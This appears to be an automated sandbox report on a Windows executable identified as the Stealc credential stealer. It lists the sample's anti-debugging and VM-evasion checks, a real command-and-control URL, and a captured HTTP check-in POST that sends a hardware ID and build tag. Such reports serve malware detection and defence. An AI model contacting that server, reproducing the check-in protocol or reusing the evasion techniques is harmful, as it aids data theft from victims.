              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003416B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_003416B9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003416A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_003416A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00361BF0 lstrcpy,ExitProcess,GetSystemInfo,ExitProcess,GetUserDefaultLangID,ExitProcess,ExitProcess,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,OpenEventA,CloseHandle,Sleep,OpenEventA,CreateEventA,CloseHandle,ExitProcess,0_2_00361BF0
              Source: file.exe, file.exe, 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: file.exe, 00000000.00000002.1425810310.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1425810310.0000000001008000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: file.exe, 00000000.00000002.1425810310.0000000000F8E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
              Source: file.exe, 00000000.00000002.1425810310.000000000100C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW?
              Source: file.exe, 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25963
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25816
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25972
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25835
              Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Hides threads from debuggers
              Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
              Tries to detect sandboxes and other dynamic analysis tools (window names)
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00344A60 VirtualProtect 00000000,00000004,00000100,?0_2_00344A60
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00366390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00366390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00366390 mov eax, dword ptr fs:[00000030h]0_2_00366390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00362A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00362A40
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Yara detected Powershell download and execute
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 7644, type: MEMORYSTR
              Searches for specific processes (likely to inject)
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00364610 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle,0_2_00364610
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003646A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,0_2_003646A0
              Source: file.exe, file.exe, 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: \Program Manager
              Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00362D60
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00361B20 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00361B20
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00362A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00362A40
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00362C10 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00362C10

              Stealing of Sensitive Information

              barindex
              Yara detected Stealc
              Source: Yara matchFile source: 00000000.00000002.1425810310.0000000000FAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1375500190.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 7644, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP

              Remote Access Functionality

              barindex
              Yara detected Stealc
              Source: Yara matchFile source: 00000000.00000002.1425810310.0000000000FAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1375500190.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 7644, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Command and Scripting Interpreter              		1
              Create Account              		11
              Process Injection              		1
              Masquerading              		OS Credential Dumping2
              System Time Discovery              		Remote Services1
              Archive Collected Data              		2
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts12
              Native API              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		33
              Virtualization/Sandbox Evasion              		LSASS Memory641
              Security Software Discovery              		Remote Desktop ProtocolData from Removable Media2
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
              Disable or Modify Tools              		Security Account Manager33
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive2
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
              Process Injection              		NTDS13
              Process Discovery              		Distributed Component Object ModelInput Capture12
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Deobfuscate/Decode Files or Information              		LSA Secrets1
              Account Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
              Obfuscated Files or Information              		Cached Domain Credentials1
              System Owner/User Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
              Software Packing              		DCSync1
              File and Directory Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              DLL Side-Loading              		Proc Filesystem324
              System Information Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              file.exe100%AviraTR/Crypt.TPM.Gen
              file.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://185.215.113.206/c4becf79229cb002.php7S100%Avira URL Cloudmalware
              http://185.215.113.206/c4becf79229cb002.phpbZ100%Avira URL Cloudmalware
              http://185.215.113.206/c4becf79229cb002.phpJZ100%Avira URL Cloudmalware
              http://185.215.113.206/~100%Avira URL Cloudmalware

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              s-part-0035.t-0009.t-msedge.net
              		13.107.246.63
              		truefalse
                		high

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.206/c4becf79229cb002.phpfalse
                  		high
                  http://185.215.113.206/false
                    		high
                    185.215.113.206/c4becf79229cb002.phpfalse
                      		high

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://185.215.113.206/c4becf79229cb002.phpbZfile.exe, 00000000.00000002.1425810310.0000000000FD3000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      		unknown
                      http://185.215.113.206/c4becf79229cb002.php/file.exe, 00000000.00000002.1425810310.0000000000FE9000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        http://185.215.113.206/~file.exe, 00000000.00000002.1425810310.0000000000FE9000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        http://185.215.113.206/c4becf79229cb002.php7Sfile.exe, 00000000.00000002.1425810310.0000000000FE9000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        http://185.215.113.206file.exe, 00000000.00000002.1425810310.0000000000F8E000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          http://185.215.113.206/Jfile.exe, 00000000.00000002.1425810310.0000000000FE9000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            http://185.215.113.206/9file.exe, 00000000.00000002.1425810310.0000000000FE9000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://185.215.113.206/c4becf79229cb002.phpJZfile.exe, 00000000.00000002.1425810310.0000000000FD3000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              		unknown
                              http://185.215.113.206/c4becf79229cb002.php%file.exe, 00000000.00000002.1425810310.0000000000FD3000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                185.215.113.206
                                		unknownPortugal
                                		206894WHOLESALECONNECTIONSNLtrue

                                General Information

                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1561592
                                Start date and time:2024-11-23 21:07:08 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 4m 3s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:6
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:file.exe
                                Detection:MAL
                                Classification:mal100.troj.evad.winEXE@1/0@0/1
                                EGA Information:
                                • Successful, ratio: 100%
                                HCA Information:
                                • Successful, ratio: 79%
                                • Number of executed functions: 18
                                • Number of non-executed functions: 121
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Stop behavior analysis, all processes terminated

                                Warnings

                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                                • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                • Not all processes where analyzed, report is missing behavior information
                                • VT rate limit hit for: file.exe

                                Simulations

                                Behavior and APIs

                                No simulations

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                185.215.113.206file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                • 185.215.113.206/c4becf79229cb002.php
                                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                • 185.215.113.206/c4becf79229cb002.php
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.206/c4becf79229cb002.php
                                file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                • 185.215.113.206/c4becf79229cb002.php
                                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                • 185.215.113.206/c4becf79229cb002.php
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.206/c4becf79229cb002.php
                                file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                • 185.215.113.206/c4becf79229cb002.php
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.206/c4becf79229cb002.php
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.206/c4becf79229cb002.php
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.206/c4becf79229cb002.php

                                Domains

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                s-part-0035.t-0009.t-msedge.netfile.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                • 13.107.246.63
                                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                • 13.107.246.63
                                file.exeGet hashmaliciousLummaC StealerBrowse
                                • 13.107.246.63
                                http://elizgallery.com/js.phpGet hashmaliciousUnknownBrowse
                                • 13.107.246.63
                                file.exeGet hashmaliciousLummaC StealerBrowse
                                • 13.107.246.63
                                file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                • 13.107.246.63
                                17323828261cfef277a3375a886445bf7f5a834ebb1cc85e533e9ac93595cd0e56ebd12426132.dat-decoded.exeGet hashmaliciousXWormBrowse
                                • 13.107.246.63
                                file.exeGet hashmaliciousLummaC StealerBrowse
                                • 13.107.246.63
                                file.exeGet hashmaliciousLummaC StealerBrowse
                                • 13.107.246.63
                                file.exeGet hashmaliciousLummaC StealerBrowse
                                • 13.107.246.63

                                ASNs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                • 185.215.113.206
                                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                • 185.215.113.206
                                file.exeGet hashmaliciousLummaC StealerBrowse
                                • 185.215.113.16
                                file.exeGet hashmaliciousLummaC StealerBrowse
                                • 185.215.113.16
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.206
                                file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                • 185.215.113.206
                                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                • 185.215.113.16
                                file.exeGet hashmaliciousLummaC StealerBrowse
                                • 185.215.113.16
                                file.exeGet hashmaliciousLummaC StealerBrowse
                                • 185.215.113.16
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.206

                                JA3 Fingerprints

                                No context

                                Dropped Files

                                No context

                                Created / dropped Files

                                No created / dropped files found

                                Static File Info

                                General

                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Entropy (8bit):7.944368801198697
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:file.exe
                                File size:1'787'392 bytes
                                MD5:925d775a24989da8e83cabcd00fde1d3
                                SHA1:73373f88fa6798ac4a4bc1566b62814deeb362de
                                SHA256:362ede5e1060f28217d49706ced46a1bea1e175bf91c4a1457f921904b9bb32a
                                SHA512:f0866e412ba6733ba460eadcd01d76b5803d8ad17a9016ec0b1d5915de0e1360d3229e9a09c5ebe1911325029388645d68aeaec1ee78e5797b2c3f83d2a5dfc6
                                SSDEEP:24576:EnHx9ww1LObpvbxoW+VeB8GjF+gQBYn1m3aTgd+2VUUNLaNRDxceeZF/6YIKt:ER9wm6doW/6kk4vTwVUsLGmy5
                                TLSH:6385333C4D93C812E80A4DFA2729B3974FB6929120A55C37B53603F9987768CB47B9C7
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8...k...k...k..'k...k...k...k..&k...k...k...k...k...k...j...k...k...k..#k...k...k...kRich...k........................PE..L..

                                File Icon

                                Icon Hash:00928e8e8686b000

                                Static PE Info

                                General

                                Entrypoint:0xa8c000
                                Entrypoint Section:.taggant
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                Time Stamp:0x672FC34F [Sat Nov 9 20:17:19 2024 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:5
                                OS Version Minor:1
                                File Version Major:5
                                File Version Minor:1
                                Subsystem Version Major:5
                                Subsystem Version Minor:1
                                Import Hash:2eabe9054cad5152567f0699947a2c5b

                                Entrypoint Preview

                                Instruction
                                jmp 00007F3874B6ABFAh

                                Rich Headers

                                Programming Language:
                                • [C++] VS2010 build 30319
                                • [ASM] VS2010 build 30319
                                • [ C ] VS2010 build 30319
                                • [ C ] VS2008 SP1 build 30729
                                • [IMP] VS2008 SP1 build 30729
                                • [LNK] VS2010 build 30319

                                Data Directories

                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x24b04d0x61.idata
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x24a0000x2b0.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x24b1f80x8.idata
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                Sections

                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                0x10000x2490000x162008530a868d76e0b20c38ca075fac0af02unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .rsrc0x24a0000x2b00x200344bb85f29920a5eb9dd794b4b3f720dFalse0.802734375data6.015078234354681IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .idata 0x24b0000x10000x2000d0399d83a742d5d86c5718841e8e842False0.134765625data0.8646718654202081IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                0x24c0000x2a40000x200b431f82448f089e0d994bfb8fedd3459unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                chbioofn0x4f00000x19b0000x19a800cc2fb367b218ec51c01ff30acf0d714dFalse0.9947662911084044data7.953525251128387IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                gsyzfhio0x68b0000x10000x4003a808a3ead8173cacf4f8026757e54adFalse0.81640625data6.391324828843364IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .taggant0x68c0000x30000x220047854bc3fbc230530ff26336bdc29d79False0.07410386029411764DOS executable (COM)0.8008234098402712IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                Resources

                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                RT_MANIFEST0x68a4440x256ASCII text, with CRLF line terminators0.5100334448160535

                                Imports

                                DLLImport
                                kernel32.dlllstrcpy

                                Network Behavior

                                Suricata IDS Alerts

                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                2024-11-23T21:08:10.385909+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.949717185.215.113.20680TCP

                                Network Port Distribution

                                TCP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Nov 23, 2024 21:08:08.474339008 CET4971780192.168.2.9185.215.113.206
                                Nov 23, 2024 21:08:08.600605011 CET8049717185.215.113.206192.168.2.9
                                Nov 23, 2024 21:08:08.600699902 CET4971780192.168.2.9185.215.113.206
                                Nov 23, 2024 21:08:08.601119995 CET4971780192.168.2.9185.215.113.206
                                Nov 23, 2024 21:08:08.725519896 CET8049717185.215.113.206192.168.2.9
                                Nov 23, 2024 21:08:09.936844110 CET8049717185.215.113.206192.168.2.9
                                Nov 23, 2024 21:08:09.937000990 CET4971780192.168.2.9185.215.113.206
                                Nov 23, 2024 21:08:09.940475941 CET4971780192.168.2.9185.215.113.206
                                Nov 23, 2024 21:08:10.064090967 CET8049717185.215.113.206192.168.2.9
                                Nov 23, 2024 21:08:10.385710955 CET8049717185.215.113.206192.168.2.9
                                Nov 23, 2024 21:08:10.385909081 CET4971780192.168.2.9185.215.113.206
                                Nov 23, 2024 21:08:12.908488035 CET4971780192.168.2.9185.215.113.206

                                DNS Answers

                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                Nov 23, 2024 21:08:01.301789999 CET1.1.1.1192.168.2.90xd5b2No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                Nov 23, 2024 21:08:01.301789999 CET1.1.1.1192.168.2.90xd5b2No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false

                                HTTP Request Dependency Graph

                                • 185.215.113.206

                                HTTP Packets

                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.949717185.215.113.206807644C:\Users\user\Desktop\file.exe
                                TimestampBytes transferredDirectionData
                                Nov 23, 2024 21:08:08.601119995 CET90OUTGET / HTTP/1.1
                                Host: 185.215.113.206
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                Nov 23, 2024 21:08:09.936844110 CET203INHTTP/1.1 200 OK
                                Date: Sat, 23 Nov 2024 20:08:09 GMT
                                Server: Apache/2.4.41 (Ubuntu)
                                Content-Length: 0
                                Keep-Alive: timeout=5, max=100
                                Connection: Keep-Alive
                                Content-Type: text/html; charset=UTF-8
                                Nov 23, 2024 21:08:09.940475941 CET413OUTPOST /c4becf79229cb002.php HTTP/1.1
                                Content-Type: multipart/form-data; boundary=----JEHDHIEGIIIDHIDHDHJJ
                                Host: 185.215.113.206
                                Content-Length: 211
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                Data Raw: 2d 2d 2d 2d 2d 2d 4a 45 48 44 48 49 45 47 49 49 49 44 48 49 44 48 44 48 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 33 32 45 42 30 34 39 39 38 44 32 33 31 30 39 39 37 33 34 39 38 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 48 44 48 49 45 47 49 49 49 44 48 49 44 48 44 48 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 48 44 48 49 45 47 49 49 49 44 48 49 44 48 44 48 4a 4a 2d 2d 0d 0a
                                Data Ascii: ------JEHDHIEGIIIDHIDHDHJJContent-Disposition: form-data; name="hwid"C32EB04998D23109973498------JEHDHIEGIIIDHIDHDHJJContent-Disposition: form-data; name="build"mars------JEHDHIEGIIIDHIDHDHJJ--
